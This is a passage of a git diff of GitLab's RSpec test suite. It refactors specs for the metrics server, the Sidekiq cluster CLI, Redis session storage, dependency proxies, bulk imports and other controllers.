diff options
Diffstat (limited to 'spec')
1318 files changed, 36040 insertions, 18387 deletions
diff --git a/spec/bin/feature_flag_spec.rb b/spec/bin/feature_flag_spec.rb index de0db8ba256..a85cafcb4a3 100644 --- a/spec/bin/feature_flag_spec.rb +++ b/spec/bin/feature_flag_spec.rb @@ -239,7 +239,7 @@ RSpec.describe 'bin/feature-flag' do end describe '.read_rollout_issue_url' do - let(:options) { OpenStruct.new(name: 'foo', type: :development) } + let(:options) { double('options', name: 'foo', type: :development) } let(:url) { 'https://issue' } it 'reads type from $stdin' do @@ -265,7 +265,7 @@ RSpec.describe 'bin/feature-flag' do end describe '.read_ee_only' do - let(:options) { OpenStruct.new(name: 'foo', type: :development) } + let(:options) { double('options', name: 'foo', type: :development) } it { expect(described_class.read_ee_only(options)).to eq(false) } end diff --git a/spec/channels/application_cable/connection_spec.rb b/spec/channels/application_cable/connection_spec.rb index 7d60548f780..c10e0c0cab4 100644 --- a/spec/channels/application_cable/connection_spec.rb +++ b/spec/channels/application_cable/connection_spec.rb @@ -2,12 +2,12 @@ require 'spec_helper' -RSpec.describe ApplicationCable::Connection, :clean_gitlab_redis_shared_state do +RSpec.describe ApplicationCable::Connection, :clean_gitlab_redis_sessions do let(:session_id) { Rack::Session::SessionId.new('6919a6f1bb119dd7396fadc38fd18d0d') } context 'when session cookie is set' do before do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.set("session:gitlab:#{session_id.private_id}", Marshal.dump(session_hash)) end diff --git a/spec/commands/metrics_server/metrics_server_spec.rb b/spec/commands/metrics_server/metrics_server_spec.rb new file mode 100644 index 00000000000..f3936e6b346 --- /dev/null +++ b/spec/commands/metrics_server/metrics_server_spec.rb @@ -0,0 +1,73 @@ +# frozen_string_literal: true + +require 'spec_helper' + +require_relative '../../../metrics_server/metrics_server' + +# End-to-end tests for the metrics server process we use to serve metrics +# from forking applications (Sidekiq, Puma) to the Prometheus scraper. +RSpec.describe 'bin/metrics-server', :aggregate_failures do + let(:config_file) { Tempfile.new('gitlab.yml') } + let(:config) do + { + 'test' => { + 'monitoring' => { + 'sidekiq_exporter' => { + 'address' => 'localhost', + 'enabled' => true, + 'port' => 3807 + } + } + } + } + end + + context 'with a running server' do + before do + # We need to send a request to localhost + WebMock.allow_net_connect! + + config_file.write(YAML.dump(config)) + config_file.close + + env = { + 'GITLAB_CONFIG' => config_file.path, + 'METRICS_SERVER_TARGET' => 'sidekiq', + 'WIPE_METRICS_DIR' => '1' + } + @pid = Process.spawn(env, 'bin/metrics-server', pgroup: true) + end + + after do + webmock_enable! + + if @pid + pgrp = Process.getpgid(@pid) + + Timeout.timeout(5) do + Process.kill('TERM', -pgrp) + Process.waitpid(@pid) + end + + expect(Gitlab::ProcessManagement.process_alive?(@pid)).to be(false) + end + rescue Errno::ESRCH => _ + # 'No such process' means the process died before + ensure + config_file.unlink + end + + it 'serves /metrics endpoint' do + expect do + Timeout.timeout(5) do + http_ok = false + until http_ok + sleep 1 + response = Gitlab::HTTP.try_get("http://localhost:3807/metrics", allow_local_requests: true) + http_ok = response&.success? + end + end + end.not_to raise_error + end + end +end diff --git a/spec/commands/sidekiq_cluster/cli_spec.rb b/spec/commands/sidekiq_cluster/cli_spec.rb index baa4a2b4ec3..148b8720740 100644 --- a/spec/commands/sidekiq_cluster/cli_spec.rb +++ b/spec/commands/sidekiq_cluster/cli_spec.rb @@ -12,8 +12,23 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath { env: 'test', directory: Dir.pwd, max_concurrency: 50, min_concurrency: 0, dryrun: false, timeout: timeout } end + let(:sidekiq_exporter_enabled) { false } + let(:sidekiq_exporter_port) { '3807' } + let(:sidekiq_health_checks_port) { '3807' } + before do stub_env('RAILS_ENV', 'test') + stub_config( + monitoring: { + sidekiq_exporter: { + enabled: sidekiq_exporter_enabled, + port: sidekiq_exporter_port + }, + sidekiq_health_checks: { + port: sidekiq_health_checks_port + } + } + ) end describe '#run' do @@ -241,12 +256,184 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath end end end + + context 'metrics server' do + let(:trapped_signals) { described_class::TERMINATE_SIGNALS + described_class::FORWARD_SIGNALS } + let(:metrics_dir) { Dir.mktmpdir } + + before do + stub_env('prometheus_multiproc_dir', metrics_dir) + end + + after do + FileUtils.rm_rf(metrics_dir, secure: true) + end + + context 'starting the server' do + context 'without --dryrun' do + context 'when there are no sidekiq_health_checks settings set' do + before do + stub_config( + monitoring: { + sidekiq_exporter: { + enabled: true, + port: sidekiq_exporter_port + } + } + ) + + allow(Gitlab::SidekiqCluster).to receive(:start) + allow(cli).to receive(:write_pid) + allow(cli).to receive(:trap_signals) + allow(cli).to receive(:start_loop) + end + + it 'does not start a sidekiq metrics server' do + expect(MetricsServer).not_to receive(:spawn) + + cli.run(%w(foo)) + end + + it 'rescues Settingslogic::MissingSetting' do + expect { cli.run(%w(foo)) }.not_to raise_error(Settingslogic::MissingSetting) + end + end + + context 'when the sidekiq_exporter.port setting is not set' do + before do + stub_config( + monitoring: { + sidekiq_exporter: { + enabled: true + }, + sidekiq_health_checks: { + port: sidekiq_health_checks_port + } + } + ) + + allow(Gitlab::SidekiqCluster).to receive(:start) + allow(cli).to receive(:write_pid) + allow(cli).to receive(:trap_signals) + allow(cli).to receive(:start_loop) + end + + it 'does not start a sidekiq metrics server' do + expect(MetricsServer).not_to receive(:spawn) + + cli.run(%w(foo)) + end + + it 'rescues Settingslogic::MissingSetting' do + expect { cli.run(%w(foo)) }.not_to raise_error(Settingslogic::MissingSetting) + end + end + + context 'when sidekiq_exporter.enabled setting is not set' do + before do + stub_config( + monitoring: { + sidekiq_exporter: {}, + sidekiq_health_checks: { + port: sidekiq_health_checks_port + } + } + ) + + allow(Gitlab::SidekiqCluster).to receive(:start) + allow(cli).to receive(:write_pid) + allow(cli).to receive(:trap_signals) + allow(cli).to receive(:start_loop) + end + + it 'does not start a sidekiq metrics server' do + expect(MetricsServer).not_to receive(:spawn) + + cli.run(%w(foo)) + end + end + + context 'with valid settings' do + using RSpec::Parameterized::TableSyntax + + where(:sidekiq_exporter_enabled, :sidekiq_exporter_port, :sidekiq_health_checks_port, :start_metrics_server) do + true | '3807' | '3907' | true + true | '3807' | '3807' | false + false | '3807' | '3907' | false + false | '3807' | '3907' | false + end + + with_them do + before do + allow(Gitlab::SidekiqCluster).to receive(:start) + allow(cli).to receive(:write_pid) + allow(cli).to receive(:trap_signals) + allow(cli).to receive(:start_loop) + end + + specify do + if start_metrics_server + expect(MetricsServer).to receive(:spawn).with('sidekiq', metrics_dir: metrics_dir, wipe_metrics_dir: true, trapped_signals: trapped_signals) + else + expect(MetricsServer).not_to receive(:spawn) + end + + cli.run(%w(foo)) + end + end + end + end + + context 'with --dryrun set' do + let(:sidekiq_exporter_enabled) { true } + + it 'does not start the server' do + expect(MetricsServer).not_to receive(:spawn) + + cli.run(%w(foo --dryrun)) + end + end + end + + context 'supervising the server' do + let(:sidekiq_exporter_enabled) { true } + let(:sidekiq_health_checks_port) { '3907' } + + before do + allow(cli).to receive(:sleep).with(a_kind_of(Numeric)) + allow(MetricsServer).to receive(:spawn).and_return(99) + cli.start_metrics_server + end + + it 'stops the metrics server when one of the processes has been terminated' do + allow(Gitlab::ProcessManagement).to receive(:process_died?).and_return(false) + allow(Gitlab::ProcessManagement).to receive(:all_alive?).with(an_instance_of(Array)).and_return(false) + allow(Gitlab::ProcessManagement).to receive(:signal_processes).with(an_instance_of(Array), :TERM) + + expect(Process).to receive(:kill).with(:TERM, 99) + + cli.start_loop + end + + it 'starts the metrics server when it is down' do + allow(Gitlab::ProcessManagement).to receive(:process_died?).and_return(true) + allow(Gitlab::ProcessManagement).to receive(:all_alive?).with(an_instance_of(Array)).and_return(false) + allow(cli).to receive(:stop_metrics_server) + + expect(MetricsServer).to receive(:spawn).with( + 'sidekiq', metrics_dir: metrics_dir, wipe_metrics_dir: false, trapped_signals: trapped_signals + ) + + cli.start_loop + end + end + end end describe '#write_pid' do context 'when a PID is specified' do it 'writes the PID to a file' do - expect(Gitlab::SidekiqCluster).to receive(:write_pid).with('/dev/null') + expect(Gitlab::ProcessManagement).to receive(:write_pid).with('/dev/null') cli.option_parser.parse!(%w(-P /dev/null)) cli.write_pid @@ -255,7 +442,7 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath context 'when no PID is specified' do it 'does not write a PID' do - expect(Gitlab::SidekiqCluster).not_to receive(:write_pid) + expect(Gitlab::ProcessManagement).not_to receive(:write_pid) cli.write_pid end @@ -264,13 +451,13 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath describe '#wait_for_termination' do it 'waits for termination of all sub-processes and succeeds after 3 checks' do - expect(Gitlab::SidekiqCluster).to receive(:any_alive?) + expect(Gitlab::ProcessManagement).to receive(:any_alive?) .with(an_instance_of(Array)).and_return(true, true, true, false) - expect(Gitlab::SidekiqCluster).to receive(:pids_alive) + expect(Gitlab::ProcessManagement).to receive(:pids_alive) .with([]).and_return([]) - expect(Gitlab::SidekiqCluster).to receive(:signal_processes) + expect(Gitlab::ProcessManagement).to receive(:signal_processes) .with([], "-KILL") stub_const("Gitlab::SidekiqCluster::CHECK_TERMINATE_INTERVAL_SECONDS", 0.1) @@ -292,13 +479,13 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath .with([['foo']], default_options) .and_return(worker_pids) - expect(Gitlab::SidekiqCluster).to receive(:any_alive?) + expect(Gitlab::ProcessManagement).to receive(:any_alive?) .with(worker_pids).and_return(true).at_least(10).times - expect(Gitlab::SidekiqCluster).to receive(:pids_alive) + expect(Gitlab::ProcessManagement).to receive(:pids_alive) .with(worker_pids).and_return([102]) - expect(Gitlab::SidekiqCluster).to receive(:signal_processes) + expect(Gitlab::ProcessManagement).to receive(:signal_processes) .with([102], "-KILL") cli.run(%w(foo)) @@ -312,9 +499,9 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath end describe '#trap_signals' do - it 'traps the termination and forwarding signals' do - expect(Gitlab::SidekiqCluster).to receive(:trap_terminate) - expect(Gitlab::SidekiqCluster).to receive(:trap_forward) + it 'traps termination and sidekiq specific signals' do + expect(Gitlab::ProcessManagement).to receive(:trap_signals).with(%i[INT TERM]) + expect(Gitlab::ProcessManagement).to receive(:trap_signals).with(%i[TTIN USR1 USR2 HUP]) cli.trap_signals end @@ -324,10 +511,10 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath it 'runs until one of the processes has been terminated' do allow(cli).to receive(:sleep).with(a_kind_of(Numeric)) - expect(Gitlab::SidekiqCluster).to receive(:all_alive?) + expect(Gitlab::ProcessManagement).to receive(:all_alive?) .with(an_instance_of(Array)).and_return(false) - expect(Gitlab::SidekiqCluster).to receive(:signal_processes) + expect(Gitlab::ProcessManagement).to receive(:signal_processes) .with(an_instance_of(Array), :TERM) cli.start_loop diff --git a/spec/config/mail_room_spec.rb b/spec/config/mail_room_spec.rb index 074549ff591..55f8fdd78ba 100644 --- a/spec/config/mail_room_spec.rb +++ b/spec/config/mail_room_spec.rb @@ -26,11 +26,11 @@ RSpec.describe 'mail_room.yml' do before do stub_env('GITLAB_REDIS_QUEUES_CONFIG_FILE', absolute_path(queues_config_path)) - clear_queues_raw_config + redis_clear_raw_config!(Gitlab::Redis::Queues) end after do - clear_queues_raw_config + redis_clear_raw_config!(Gitlab::Redis::Queues) end context 'when incoming email is disabled' do @@ -103,12 +103,6 @@ RSpec.describe 'mail_room.yml' do end end - def clear_queues_raw_config - Gitlab::Redis::Queues.remove_instance_variable(:@_raw_config) - rescue NameError - # raised if @_raw_config was not set; ignore - end - def absolute_path(path) Rails.root.join(path).to_s end diff --git a/spec/controllers/abuse_reports_controller_spec.rb b/spec/controllers/abuse_reports_controller_spec.rb index 3ef78226db0..11371108375 100644 --- a/spec/controllers/abuse_reports_controller_spec.rb +++ b/spec/controllers/abuse_reports_controller_spec.rb @@ -19,7 +19,7 @@ RSpec.describe AbuseReportsController do context 'when the user has already been deleted' do it 'redirects the reporter to root_path' do user_id = user.id - user.destroy + user.destroy! get :new, params: { user_id: user_id } diff --git a/spec/controllers/admin/clusters_controller_spec.rb b/spec/controllers/admin/clusters_controller_spec.rb index bd0c2965906..25c4830a79a 100644 --- a/spec/controllers/admin/clusters_controller_spec.rb +++ b/spec/controllers/admin/clusters_controller_spec.rb @@ -278,7 +278,8 @@ RSpec.describe Admin::ClustersController do end allow_next_instance_of(GoogleApi::CloudPlatform::Client) do |instance| allow(instance).to receive(:projects_zones_clusters_create) do - OpenStruct.new( + double( + 'instance', self_link: 'projects/gcp-project-12345/zones/us-central1-a/operations/ope-123', status: 'RUNNING' ) diff --git a/spec/controllers/admin/integrations_controller_spec.rb b/spec/controllers/admin/integrations_controller_spec.rb index cf6a6385425..410bc0ddc1d 100644 --- a/spec/controllers/admin/integrations_controller_spec.rb +++ b/spec/controllers/admin/integrations_controller_spec.rb @@ -105,40 +105,4 @@ RSpec.describe Admin::IntegrationsController do .and change { Integrations::Jira.inherit_from_id(integration.id).count }.by(-1) end end - - describe '#overrides' do - let_it_be(:instance_integration) { create(:bugzilla_integration, :instance) } - let_it_be(:non_overridden_integration) { create(:bugzilla_integration, inherit_from_id: instance_integration.id) } - let_it_be(:overridden_integration) { create(:bugzilla_integration) } - let_it_be(:overridden_other_integration) { create(:confluence_integration) } - - subject do - get :overrides, params: { id: instance_integration.class.to_param }, format: format - end - - context 'when format is JSON' do - let(:format) { :json } - - include_context 'JSON response' - - it 'returns projects with overrides', :aggregate_failures do - subject - - expect(response).to have_gitlab_http_status(:ok) - expect(response).to include_pagination_headers - expect(json_response).to contain_exactly(a_hash_including('full_name' => overridden_integration.project.full_name)) - end - end - - context 'when format is HTML' do - let(:format) { :html } - - it 'renders template' do - subject - - expect(response).to render_template 'shared/integrations/overrides' - expect(assigns(:integration)).to eq(instance_integration) - end - end - end end diff --git a/spec/controllers/application_controller_spec.rb b/spec/controllers/application_controller_spec.rb index e623c1ab940..004bea02580 100644 --- a/spec/controllers/application_controller_spec.rb +++ b/spec/controllers/application_controller_spec.rb @@ -732,17 +732,8 @@ RSpec.describe ApplicationController do get :index - expect(response.headers['Cache-Control']).to eq 'private, no-store' expect(response.headers['Pragma']).to eq 'no-cache' end - - it 'does not set the "no-store" header for XHR requests' do - sign_in(user) - - get :index, xhr: true - - expect(response.headers['Cache-Control']).to eq 'max-age=0, private, must-revalidate' - end end end diff --git a/spec/controllers/boards/issues_controller_spec.rb b/spec/controllers/boards/issues_controller_spec.rb index b2200050e41..1fd249eba69 100644 --- a/spec/controllers/boards/issues_controller_spec.rb +++ b/spec/controllers/boards/issues_controller_spec.rb @@ -484,7 +484,7 @@ RSpec.describe Boards::IssuesController do context 'with guest user' do context 'in open list' do it 'returns a successful 200 response' do - open_list = board.lists.create(list_type: :backlog) + open_list = board.lists.create!(list_type: :backlog) create_issue user: guest, board: board, list: open_list, title: 'New issue' expect(response).to have_gitlab_http_status(:ok) diff --git a/spec/controllers/google_api/authorizations_controller_spec.rb b/spec/controllers/google_api/authorizations_controller_spec.rb index 3dd2cc307d5..3bf50f98791 100644 --- a/spec/controllers/google_api/authorizations_controller_spec.rb +++ b/spec/controllers/google_api/authorizations_controller_spec.rb @@ -88,5 +88,26 @@ RSpec.describe GoogleApi::AuthorizationsController do it_behaves_like 'access denied' end + + context 'user logs in but declines authorizations' do + subject { get :callback, params: { error: 'xxx', state: state } } + + let(:session_key) { 'session-key' } + let(:redirect_uri) { 'example.com' } + let(:error_uri) { 'error.com' } + let(:state) { session_key } + + before do + session[GoogleApi::CloudPlatform::Client.session_key_for_redirect_uri(session_key)] = redirect_uri + session[:error_uri] = error_uri + allow_next_instance_of(GoogleApi::CloudPlatform::Client) do |instance| + allow(instance).to receive(:get_token).and_return([token, expires_at]) + end + end + + it 'redirects to error uri' do + expect(subject).to redirect_to(error_uri) + end + end end end diff --git a/spec/controllers/graphql_controller_spec.rb b/spec/controllers/graphql_controller_spec.rb index f9b15c9a48e..578ce04721c 100644 --- a/spec/controllers/graphql_controller_spec.rb +++ b/spec/controllers/graphql_controller_spec.rb @@ -262,5 +262,16 @@ RSpec.describe GraphqlController do expect(controller).to have_received(:append_info_to_payload) expect(log_payload.dig(:metadata, :graphql)).to match_array(expected_logs) end + + it 'appends the exception in case of errors' do + exception = StandardError.new('boom') + + expect(controller).to receive(:execute).and_raise(exception) + + post :execute, params: { _json: graphql_queries } + + expect(controller).to have_received(:append_info_to_payload) + expect(log_payload.dig(:exception_object)).to eq(exception) + end end end diff --git a/spec/controllers/groups/dependency_proxies_controller_spec.rb b/spec/controllers/groups/dependency_proxies_controller_spec.rb index 35bd7d47aed..67847936a80 100644 --- a/spec/controllers/groups/dependency_proxies_controller_spec.rb +++ b/spec/controllers/groups/dependency_proxies_controller_spec.rb @@ -3,8 +3,9 @@ require 'spec_helper' RSpec.describe Groups::DependencyProxiesController do - let(:group) { create(:group) } - let(:user) { create(:user) } + let_it_be(:group) { create(:group) } + let_it_be_with_reload(:dependency_proxy_group_setting) { create(:dependency_proxy_group_setting, group: group) } + let_it_be(:user) { create(:user) } before do group.add_owner(user) @@ -12,62 +13,37 @@ RSpec.describe Groups::DependencyProxiesController do end describe 'GET #show' do - context 'feature enabled' do - before do - enable_dependency_proxy - end - - it 'returns 200 and renders the view' do - get :show, params: { group_id: group.to_param } + subject { get :show, params: { group_id: group.to_param } } - expect(response).to have_gitlab_http_status(:ok) - expect(response).to render_template('groups/dependency_proxies/show') - end + before do + stub_config(dependency_proxy: { enabled: config_enabled }) end - it 'returns 404 when feature is disabled' do - disable_dependency_proxy + context 'with global config enabled' do + let(:config_enabled) { true } - get :show, params: { group_id: group.to_param } + context 'with the setting enabled' do + it 'returns 200 and renders the view' do + subject - expect(response).to have_gitlab_http_status(:not_found) - end - end - - describe 'PUT #update' do - context 'feature enabled' do - before do - enable_dependency_proxy + expect(response).to have_gitlab_http_status(:ok) + expect(response).to render_template('groups/dependency_proxies/show') + end end - it 'redirects back to show page' do - put :update, params: update_params + context 'with the setting disabled' do + before do + dependency_proxy_group_setting.update!(enabled: false) + end - expect(response).to have_gitlab_http_status(:found) + it_behaves_like 'returning response status', :not_found end end - it 'returns 404 when feature is disabled' do - put :update, params: update_params + context 'with global config disabled' do + let(:config_enabled) { false } - expect(response).to have_gitlab_http_status(:not_found) + it_behaves_like 'returning response status', :not_found end - - def update_params - { - group_id: group.to_param, - dependency_proxy_group_setting: { enabled: true } - } - end - end - - def enable_dependency_proxy - stub_config(dependency_proxy: { enabled: true }) - - group.create_dependency_proxy_setting!(enabled: true) - end - - def disable_dependency_proxy - group.create_dependency_proxy_setting!(enabled: false) end end diff --git a/spec/controllers/groups/dependency_proxy_for_containers_controller_spec.rb b/spec/controllers/groups/dependency_proxy_for_containers_controller_spec.rb index b22307578ab..0f262d93d4c 100644 --- a/spec/controllers/groups/dependency_proxy_for_containers_controller_spec.rb +++ b/spec/controllers/groups/dependency_proxy_for_containers_controller_spec.rb @@ -170,7 +170,7 @@ RSpec.describe Groups::DependencyProxyForContainersController do let(:pull_response) { { status: :success, manifest: manifest, from_cache: false } } before do - allow_next_instance_of(DependencyProxy::FindOrCreateManifestService) do |instance| + allow_next_instance_of(DependencyProxy::FindCachedManifestService) do |instance| allow(instance).to receive(:execute).and_return(pull_response) end end diff --git a/spec/controllers/groups/group_members_controller_spec.rb b/spec/controllers/groups/group_members_controller_spec.rb index 4b17326de09..04a9b9f5250 100644 --- a/spec/controllers/groups/group_members_controller_spec.rb +++ b/spec/controllers/groups/group_members_controller_spec.rb @@ -293,7 +293,6 @@ RSpec.describe Groups::GroupMembersController do context 'when `expires_at` is set' do it 'returns correct json response' do expect(json_response).to eq({ - "expires_in" => "about 1 month", "expires_soon" => false, "expires_at_formatted" => expiry_date.to_time.in_time_zone.to_s(:medium) }) diff --git a/spec/controllers/groups_controller_spec.rb b/spec/controllers/groups_controller_spec.rb index 2525146c673..a7625e65603 100644 --- a/spec/controllers/groups_controller_spec.rb +++ b/spec/controllers/groups_controller_spec.rb @@ -82,16 +82,6 @@ RSpec.describe GroupsController, factory_default: :keep do expect(subject).to redirect_to group_import_path(group) end end - - context 'publishing the invite_members_for_task experiment' do - it 'publishes the experiment data to the client' do - wrapped_experiment(experiment(:invite_members_for_task)) do |e| - expect(e).to receive(:publish_to_client) - end - - get :show, params: { id: group.to_param, open_modal: 'invite_members_for_task' }, format: format - end - end end describe 'GET #details' do diff --git a/spec/controllers/import/bulk_imports_controller_spec.rb b/spec/controllers/import/bulk_imports_controller_spec.rb index 3adba32c74a..a7089005abf 100644 --- a/spec/controllers/import/bulk_imports_controller_spec.rb +++ b/spec/controllers/import/bulk_imports_controller_spec.rb @@ -215,9 +215,13 @@ RSpec.describe Import::BulkImportsController do let(:pat) { "fake-pat" } let(:bulk_import_params) do [{ "source_type" => "group_entity", - "source_full_path" => "full_path", - "destination_name" => "destination_name", - "destination_namespace" => "root" }] + "source_full_path" => "full_path", + "destination_name" => "destination_name", + "destination_namespace" => "root" }, + { "source_type" => "group_entity2", + "source_full_path" => "full_path2", + "destination_name" => "destination_name2", + "destination_namespace" => "root" }] end before do @@ -225,29 +229,23 @@ RSpec.describe Import::BulkImportsController do session[:bulk_import_gitlab_url] = instance_url end - it 'executes BulkImpors::CreatetService' do + it 'executes BulkImpors::CreateService' do + error_response = ServiceResponse.error(message: 'Record invalid', http_status: :unprocessable_entity) + expect_next_instance_of( - ::BulkImports::CreateService, user, bulk_import_params, { url: instance_url, access_token: pat }) do |service| + ::BulkImports::CreateService, user, bulk_import_params[0], { url: instance_url, access_token: pat }) do |service| allow(service).to receive(:execute).and_return(ServiceResponse.success(payload: bulk_import)) end - - post :create, params: { bulk_import: bulk_import_params } - - expect(response).to have_gitlab_http_status(:ok) - expect(response.body).to eq({ id: bulk_import.id }.to_json) - end - - it 'returns error when validation fails' do - error_response = ServiceResponse.error(message: 'Record invalid', http_status: :unprocessable_entity) expect_next_instance_of( - ::BulkImports::CreateService, user, bulk_import_params, { url: instance_url, access_token: pat }) do |service| + ::BulkImports::CreateService, user, bulk_import_params[1], { url: instance_url, access_token: pat }) do |service| allow(service).to receive(:execute).and_return(error_response) end post :create, params: { bulk_import: bulk_import_params } - expect(response).to have_gitlab_http_status(:unprocessable_entity) - expect(response.body).to eq({ error: 'Record invalid' }.to_json) + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to eq([{ "success" => true, "id" => bulk_import.id, "message" => nil }, + { "success" => false, "id" => nil, "message" => "Record invalid" }]) end end end diff --git a/spec/controllers/import/fogbugz_controller_spec.rb b/spec/controllers/import/fogbugz_controller_spec.rb index 376c089df78..d351e1cc3f3 100644 --- a/spec/controllers/import/fogbugz_controller_spec.rb +++ b/spec/controllers/import/fogbugz_controller_spec.rb @@ -79,15 +79,18 @@ RSpec.describe Import::FogbugzController do end describe 'GET status' do + let(:repo) do + instance_double(Gitlab::FogbugzImport::Repository, + id: 'demo', name: 'vim', safe_name: 'vim', path: 'vim') + end + before do - @repo = OpenStruct.new(id: 'demo', name: 'vim') stub_client(valid?: true) end it_behaves_like 'import controller status' do - let(:repo) { @repo } - let(:repo_id) { @repo.id } - let(:import_source) { @repo.name } + let(:repo_id) { repo.id } + let(:import_source) { repo.name } let(:provider_name) { 'fogbugz' } let(:client_repos_field) { :repos } end diff --git a/spec/controllers/invites_controller_spec.rb b/spec/controllers/invites_controller_spec.rb index d4091461062..c5e693e3489 100644 --- a/spec/controllers/invites_controller_spec.rb +++ b/spec/controllers/invites_controller_spec.rb @@ -97,52 +97,6 @@ RSpec.describe InvitesController do ) end - context 'when it is part of the invite_email_preview_text experiment' do - let(:extra_params) { { invite_type: 'initial_email', experiment_name: 'invite_email_preview_text' } } - - it 'tracks the initial join click from email' do - experiment = double(track: true) - allow(controller).to receive(:experiment).with(:invite_email_preview_text, actor: member).and_return(experiment) - - request - - expect(experiment).to have_received(:track).with(:join_clicked) - end - - context 'when member does not exist' do - let(:raw_invite_token) { '_bogus_token_' } - - it 'does not track the experiment' do - expect(controller).not_to receive(:experiment).with(:invite_email_preview_text, actor: member) - - request - end - end - end - - context 'when it is part of the invite_email_from experiment' do - let(:extra_params) { { invite_type: 'initial_email', experiment_name: 'invite_email_from' } } - - it 'tracks the initial join click from email' do - experiment = double(track: true) - allow(controller).to receive(:experiment).with(:invite_email_from, actor: member).and_return(experiment) - - request - - expect(experiment).to have_received(:track).with(:join_clicked) - end - - context 'when member does not exist' do - let(:raw_invite_token) { '_bogus_token_' } - - it 'does not track the experiment' do - expect(controller).not_to receive(:experiment).with(:invite_email_from, actor: member) - - request - end - end - end - context 'when member does not exist' do let(:raw_invite_token) { '_bogus_token_' } @@ -168,15 +122,6 @@ RSpec.describe InvitesController do label: 'invite_email' ) end - - context 'when it is not part of our invite email experiment' do - it 'does not track via experiment', :aggregate_failures do - expect(controller).not_to receive(:experiment).with(:invite_email_preview_text, actor: member) - expect(controller).not_to receive(:experiment).with(:invite_email_from, actor: member) - - request - end - end end context 'when not logged in' do diff --git a/spec/controllers/omniauth_callbacks_controller_spec.rb b/spec/controllers/omniauth_callbacks_controller_spec.rb index 8c8de2f79a3..e70b8af2068 100644 --- a/spec/controllers/omniauth_callbacks_controller_spec.rb +++ b/spec/controllers/omniauth_callbacks_controller_spec.rb @@ -479,6 +479,19 @@ RSpec.describe OmniauthCallbacksController, type: :controller do post :saml, params: { SAMLResponse: mock_saml_response } end end + + context 'with a blocked user trying to log in when there are hooks set up' do + let(:user) { create(:omniauth_user, extern_uid: 'my-uid', provider: 'saml') } + + subject(:post_action) { post :saml, params: { SAMLResponse: mock_saml_response } } + + before do + create(:system_hook) + user.block! + end + + it { expect { post_action }.not_to raise_error } + end end describe 'enable admin mode' do diff --git a/spec/controllers/profiles/emails_controller_spec.rb b/spec/controllers/profiles/emails_controller_spec.rb index ce16632472f..214a893f0fa 100644 --- a/spec/controllers/profiles/emails_controller_spec.rb +++ b/spec/controllers/profiles/emails_controller_spec.rb @@ -33,7 +33,7 @@ RSpec.describe Profiles::EmailsController do subject expect(response).to have_gitlab_http_status(:redirect) - expect(flash[:alert]).to eq(_('This action has been performed too many times. Try again later.')) + expect(flash[:alert]).to eq(_('This endpoint has been requested too many times. Try again later.')) end end end diff --git a/spec/controllers/projects/issues_controller_spec.rb b/spec/controllers/projects/issues_controller_spec.rb index 68cccfa8bde..763c3e43e27 100644 --- a/spec/controllers/projects/issues_controller_spec.rb +++ b/spec/controllers/projects/issues_controller_spec.rb @@ -201,32 +201,6 @@ RSpec.describe Projects::IssuesController do expect(response).to have_gitlab_http_status(:ok) expect(json_response['issue_email_participants']).to contain_exactly({ "email" => participants[0].email }, { "email" => participants[1].email }) end - - context 'with the invite_members_in_comment experiment', :experiment do - context 'when user can invite' do - before do - stub_experiments(invite_members_in_comment: :invite_member_link) - project.add_maintainer(user) - end - - it 'assigns the candidate experience and tracks the event' do - expect(experiment(:invite_members_in_comment)).to track(:view, property: project.root_ancestor.id.to_s) - .for(:invite_member_link) - .with_context(namespace: project.root_ancestor) - .on_next_instance - - get :show, params: { namespace_id: project.namespace, project_id: project, id: issue.iid } - end - end - - context 'when user can not invite' do - it 'does not track the event' do - expect(experiment(:invite_members_in_comment)).not_to track(:view) - - get :show, params: { namespace_id: project.namespace, project_id: project, id: issue.iid } - end - end - end end describe 'GET #new' do @@ -1197,6 +1171,15 @@ RSpec.describe Projects::IssuesController do end end + context 'when trying to create a task' do + it 'defaults to issue type' do + issue = post_new_issue(issue_type: 'task') + + expect(issue.issue_type).to eq('issue') + expect(issue.work_item_type.base_type).to eq('issue') + end + end + it 'creates the issue successfully', :aggregate_failures do issue = post_new_issue diff --git a/spec/controllers/projects/learn_gitlab_controller_spec.rb b/spec/controllers/projects/learn_gitlab_controller_spec.rb index 620982f73be..2d00fcbccf3 100644 --- a/spec/controllers/projects/learn_gitlab_controller_spec.rb +++ b/spec/controllers/projects/learn_gitlab_controller_spec.rb @@ -5,14 +5,15 @@ require 'spec_helper' RSpec.describe Projects::LearnGitlabController do describe 'GET #index' do let_it_be(:user) { create(:user) } - let_it_be(:project) { create(:project, namespace: user.namespace) } + let_it_be(:project) { create(:project, namespace: create(:group)) } let(:learn_gitlab_enabled) { true } let(:params) { { namespace_id: project.namespace.to_param, project_id: project } } - subject { get :index, params: params } + subject(:action) { get :index, params: params } before do + project.namespace.add_owner(user) allow(controller.helpers).to receive(:learn_gitlab_enabled?).and_return(learn_gitlab_enabled) end @@ -32,6 +33,10 @@ RSpec.describe Projects::LearnGitlabController do it { is_expected.to have_gitlab_http_status(:not_found) } end + + it_behaves_like 'tracks assignment and records the subject', :invite_for_help_continuous_onboarding, :namespace do + subject { project.namespace } + end end end end diff --git a/spec/controllers/projects/merge_requests/diffs_controller_spec.rb b/spec/controllers/projects/merge_requests/diffs_controller_spec.rb index 5b1c6777523..f7370a1a1ac 100644 --- a/spec/controllers/projects/merge_requests/diffs_controller_spec.rb +++ b/spec/controllers/projects/merge_requests/diffs_controller_spec.rb @@ -496,6 +496,7 @@ RSpec.describe Projects::MergeRequests::DiffsController do { environment: nil, merge_request: merge_request, + commit: nil, diff_view: :inline, merge_ref_head_diff: nil, allow_tree_conflicts: true, @@ -552,7 +553,7 @@ RSpec.describe Projects::MergeRequests::DiffsController do it_behaves_like 'serializes diffs with expected arguments' do let(:collection) { Gitlab::Diff::FileCollection::Commit } - let(:expected_options) { collection_arguments } + let(:expected_options) { collection_arguments.merge(commit: 